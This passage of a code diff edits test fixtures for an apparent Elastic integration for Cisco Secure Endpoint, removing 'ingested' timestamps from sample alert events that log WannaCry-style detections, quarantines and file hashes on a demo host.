@@ -4946,7 +4887,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376919317Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -5032,7 +4972,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376920276Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -5116,7 +5055,6 @@ ], "code": "553648143", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376921529Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 0652bffefcb..89d77b87ac6 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json 
@@ -46,7 +46,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131245933Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -122,7 +121,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131248362Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -198,7 +196,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131249278Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -274,7 +271,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131250102Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -350,7 +346,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131250880Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -426,7 +421,6 @@ ], "code": "2164260880", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131251658Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -500,7 +494,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131252412Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -590,7 +583,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131253167Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 
@@ -687,7 +679,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131253930Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -773,7 +764,6 @@ ], "code": "1090519054", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131254690Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -857,7 +847,6 @@ ], "code": "553648143", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131255452Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -929,7 +918,6 @@ ], "code": "553648143", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131256437Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1001,7 +989,6 @@ ], "code": "553648143", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131257211Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -1075,7 +1062,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131257982Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1165,7 +1151,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131258771Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat 